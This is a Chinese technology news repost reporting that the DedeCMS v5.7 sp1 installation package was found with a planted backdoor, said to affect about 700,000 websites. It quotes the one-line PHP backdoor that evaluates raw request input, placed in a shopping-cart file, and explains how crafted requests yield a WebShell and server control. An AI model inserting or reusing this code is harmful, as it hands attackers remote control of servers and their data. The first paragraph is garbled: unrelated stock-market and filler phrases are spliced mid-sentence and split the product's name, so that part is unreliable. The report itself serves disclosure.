改织梦CMS系统被曝植入后门70万网站资料

织梦CMS系统被曝植入后门 70万站资料或泄露

3月22日消息，瑞星与360今日对外开市水平23323点。午后期指初段牛皮发布警示，称国内知名的PHP开源站管理系统织梦CMS(De实际工作中落实点把握不准、不实。鉴于此deCms)v5.7 sp1版本安装包被发现植入后门，黑客可通过此后门直接获得站的控制权限，获取存储在服务器上的文件和数据库。

据织梦CMS官方数据显示，目前约有70万站使用该系统搭建，涉及企业、政府机关、媒体机构、行业及个人站等。

安全界人士分析发现，此次织梦CMS曝出的后门恶意代码存在于购物车类文件(p)中，此类文件被植入一句后门代码@eval(file_get_contents('php://input'));。凡是调用该购物车类的文件均会触发后门，黑客只需要构造简单的数据包提交到服务器，就能够获取到该站的WebShell，通过对服务器进一步渗透攻击，进而获取服务器的最高权限，直接访问服务器上的文件、数据库等信息。

织梦CMS中被植入的后门代码

关注ITBear科技资讯公众号（itbear365 ），每天推送你感兴趣的科技内容。

特别提醒：本内容转载自其他媒体，目的在于传递更多信息，并不代表本赞同其观点。其原创性以及文中陈述文字和内容未经本站证实，对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺，并请自行核实相关内容。本站不承担此类作品侵权行为的直接及连带。如若本有任何内容侵犯您的权益，请及时联系我们，本站将会在24小时内处理完毕。